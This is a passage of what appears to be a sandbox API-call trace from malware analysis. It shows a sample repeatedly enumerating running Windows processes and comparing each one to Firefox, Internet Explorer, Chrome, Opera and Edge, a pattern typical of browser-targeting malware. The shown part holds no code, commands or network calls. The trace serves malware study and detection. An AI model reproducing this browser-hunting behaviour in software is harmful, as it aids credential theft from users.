cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0193.058] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0193.058] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0193.058] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0193.058] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0193.058] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.058] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0193.138] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0193.165] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0193.165] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0193.165] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0193.165] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.165] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0193.166] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0193.166] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0193.166] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0193.166] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0193.166] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.166] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0193.167] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0193.167] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0193.167] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0193.167] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0193.167] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.167] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0193.167] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0193.167] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0193.167] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0193.167] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0193.167] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.167] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0193.168] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0193.168] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0193.168] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0193.168] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0193.168] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0193.168] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0193.169] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0193.169] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0193.169] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0193.169] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="opera.exe") returned 1 [0193.169] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.169] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0193.170] CloseHandle (hObject=0xe8) returned 1 [0193.170] Sleep (dwMilliseconds=0x3e8) [0194.197] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0194.199] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.200] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0194.200] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0194.200] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0194.200] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0194.200] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0194.200] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0194.201] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0194.201] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0194.201] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0194.201] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0194.201] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0194.201] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0194.201] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0194.201] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0194.201] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0194.201] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0194.201] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.201] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0194.202] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0194.202] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0194.202] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0194.202] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0194.202] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.202] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0194.202] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0194.202] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0194.202] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0194.202] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0194.202] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.202] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0194.203] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0194.203] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0194.203] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0194.203] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0194.203] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.203] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0194.204] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0194.204] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0194.204] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0194.204] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0194.204] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.204] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0194.204] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0194.204] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0194.204] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0194.204] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0194.204] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.204] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0194.205] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0194.205] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0194.205] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0194.205] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0194.205] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.205] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0194.205] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0194.205] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0194.205] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0194.205] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0194.205] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.206] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.206] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0194.206] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0194.206] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0194.206] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0194.206] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.206] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.207] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0194.207] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0194.207] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0194.207] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0194.207] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.207] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.207] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0194.207] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0194.207] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0194.207] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0194.207] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.207] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.208] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0194.208] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0194.208] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0194.208] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0194.208] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.208] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.208] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0194.208] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0194.208] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0194.208] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0194.208] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.209] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0194.209] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0194.209] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0194.209] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0194.209] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0194.209] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.209] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.210] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0194.210] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0194.210] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0194.210] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0194.210] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.210] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.210] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0194.210] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0194.210] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0194.210] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0194.210] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.210] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0194.211] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0194.211] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0194.211] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0194.211] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0194.211] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.211] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0194.211] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0194.211] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0194.211] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0194.211] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0194.211] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.211] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0194.212] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0194.212] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0194.212] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0194.212] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0194.212] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.212] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.213] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0194.213] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0194.213] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0194.213] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0194.213] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.213] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0194.213] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0194.213] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0194.213] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0194.213] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0194.213] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.213] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0194.214] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0194.214] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0194.214] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0194.214] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0194.214] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.214] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0194.214] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0194.214] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0194.214] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0194.214] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0194.215] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.215] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0194.215] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0194.215] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0194.215] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0194.215] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0194.215] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.215] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0194.216] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0194.216] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0194.216] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0194.216] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0194.216] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.216] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0194.216] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0194.216] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0194.216] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0194.216] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0194.216] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.216] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0194.217] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0194.217] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0194.217] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0194.217] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0194.217] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.217] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0194.217] lstrcmpiA (lpString1="potentially.exe", 